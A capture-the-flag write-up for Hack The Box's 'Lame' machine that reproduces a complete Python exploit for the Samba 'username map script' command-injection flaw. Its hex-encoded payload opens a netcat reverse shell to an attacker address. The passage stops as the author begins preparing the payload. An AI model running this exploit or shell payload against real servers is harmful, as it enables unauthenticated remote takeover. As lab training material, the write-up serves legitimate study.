HackTheBox “Lame” With & Without Metasploit WriteUp

3 min readApr 17, 2022

Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Scanning:

lets see if we can get something from samba as we have failed to get anything from vsftpd:

Exploitation:

Using Metasploit method:

Using Non-Metasploit Method:

After looking for a manual way at google we find the below script:

script: https://raw.githubusercontent.com/v1nc3-source/Samba_3.x_4.x_exploit/main/smb3exploit.py

#!/usr/bin/python from smb.SMBConnection import SMBConnection import random, string from smb import smb_structs smb_structs.SUPPORT_SMB2 = False import sys # Just a python version of a very simple Samba exploit. # It doesn’t have to be pretty because the shellcode is executed # in the username field. # Based off this Metasploit module — https://www.exploit-db.com/exploits/16320/ # Configured SMB connection options with info from here: # https://pythonhosted.org/pysmb/api/smb_SMBConnection.html # Use the commandline argument as the target: if len(sys.argv) < 2: print (“\nUsage: “ + sys.argv[0] + “ <HOST>\n”) sys.exit() # Shellcode: # msfvenom -p cmd/unix/reverse_netcat LHOST=tun0 LPORT=8999 -f python buf = b”” buf += b”\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66" buf += b”\x62\x6e\x72\x69\x67\x3b\x20\x6e\x63\x20\x31\x30\x2e” buf += b”\x31\x30\x2e\x31\x34\x2e\x31\x30\x31\x20\x38\x39\x39" buf += b”\x39\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x66\x62\x6e\x72" buf += b”\x69\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20" buf += b”\x3e\x2f\x74\x6d\x70\x2f\x66\x62\x6e\x72\x69\x67\x20" buf += b”\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70" buf += b”\x2f\x66\x62\x6e\x72\x69\x67" username = “/=`nohup “ + buf.decode() + “`” password = “” conn = SMBConnection(username, password, “SOMEBODYHACKINGYOU” , “METASPLOITABLE”, use_ntlm_v2 = False) assert conn.connect(sys.argv[1], 445)

This script exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! (source: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script ).

First we prepare our payload and replace it with the one inside the script: